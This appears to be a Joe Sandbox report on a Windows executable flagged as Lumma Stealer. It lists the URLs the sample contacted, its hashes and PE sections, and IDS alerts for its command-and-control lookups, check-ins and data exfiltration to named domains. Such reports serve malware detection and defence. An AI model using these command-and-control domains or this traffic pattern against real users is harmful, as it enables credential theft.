                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steam.tv/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://lev-tolstoi.com/(aLNn56KMkEE.exe, 00000000.00000003.1752668180.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://lev-tolstoi.com/LNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929021676.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798241314.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924363076.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798154813.0000000005895000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://store.steampowered.com/privacy_agreement/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/points/shop/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ocsp.rootca1.amazontrust.com0:LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://help.steampowered.cLNn56KMkEE.exefalse
                                                                                                                                        unknown
                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016LNn56KMkEE.exe, 00000000.00000003.1798001188.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776244890.00000000058DE000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798274391.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1798111491.00000000058DF000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1776196742.00000000058E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aLNn56KMkEE.exe, LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924283803.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 
00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sketchfab.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lv.queniujq.cnLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLNn56KMkEE.exe, 00000000.00000003.1819509405.000000000599F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.youtube.com/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://lev-tolstoi.com/n7LNn56KMkEE.exe, 00000000.00000002.1929359767.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1887045609.0000000001075000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1924201177.0000000001075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579784
Start date and time: 2024-12-23 09:05:43 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:LNn56KMkEE.exe
                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                              Original Sample Name:5f8d5c992633d84420477157cb75f8ae.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                              • Number of non-executed functions: 1
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Execution Graph export aborted for target LNn56KMkEE.exe, PID 6948 because there are no executed function
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:06:35  API Interceptor  13x Sleep call for process: LNn56KMkEE.exe modified
                                                                                                                                                                                                                                              • 172.67.150.173
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948738290319071
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: LNn56KMkEE.exe
File size: 1'866'752 bytes
MD5: 5f8d5c992633d84420477157cb75f8ae
SHA1: 96e3391bb7d724dc2473e9683d5c4d8b127838b8
SHA256: 417c9ef01a8077d082b1b053311d219902988c959cc91ccffa262bff29fe8cbb
SHA512: 27b58d86c104c532ec5ccf6ddd2089a5eaedf6a5c86d0325efc9544fdd6f598b6452b947ba3081878d886d9288649def9f35ae49243ebc3d78bfbb6ccda84d1c
SSDEEP: 49152:TkpZ4wqdmt2o6XYHPOIqefFrjfqO/53INx:TkpZ4jmwo6o/rFHi+M
TLSH: 3F8533148DAF353FF649EB356BA1440A399D8488334AEED52F31C4AAD281E3D4449DFE
                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@..........................@J.....7.....@.................................T0..h..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8a1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], cl
                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add eax, 0000000Ah
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], dl
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [edx], al
                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x51000 | 0x24800 | f2bc9cda856d92e440852f54f7dc1256 | False | 0.9973646190068494 | data | 7.979452992812568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x54000 | 0x2ac000 | 0x200 | b4e2ecd9fb9893d34c3283cb63cf58f8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| srolqark | 0x300000 | 0x1a0000 | 0x19f600 | 15c4b2457a6ee9f9527811b39b6ea1e5 | False | 0.9948659202904002 | data | 7.954307245749782 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| yixtsbvq | 0x4a0000 | 0x1000 | 0x600 | 6f3b766087fb66517636e16ff1e7db89 | False | 0.5813802083333334 | data | 4.998219211278565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x4a1000 | 0x3000 | 0x2200 | f038de58a0779cf181581da23bcb6503 | False | 0.06399356617647059 | DOS executable (COM) | 0.8270228919795393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-23T09:06:36.516878+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.4 | 53914 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.672146+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.4 | 60394 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.812543+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.4 | 62659 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:36.955604+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.4 | 56390 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.105933+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.4 | 50214 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.263224+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.4 | 54779 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.470705+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.4 | 62869 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.668445+0100 | 2058358 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) | 1 | 192.168.2.4 | 52846 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:37.810524+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.4 | 57491 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T09:06:39.564438+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2024-12-23T09:06:40.318447+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2024-12-23T09:06:41.908306+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:42.631868+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:42.631868+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.206100+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.975014+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:44.975014+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:46.561842+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:48.814360+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:49.473733+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:50.909006+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:53.676746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:06:56.370335+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP |
| 2024-12-23T09:07:00.486545+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 104.21.66.86 | 443 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| Dec 23, 2024 09:06:38.170588017 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Dec 23, 2024 09:06:38.170701027 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Dec 23, 2024 09:06:38.170798063 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Dec 23, 2024 09:06:38.174583912 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
| Dec 23, 2024 09:06:38.174613953 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Dec 23, 2024 09:06:39.564276934 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
| Dec 23, 2024 09:06:39.564438105 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
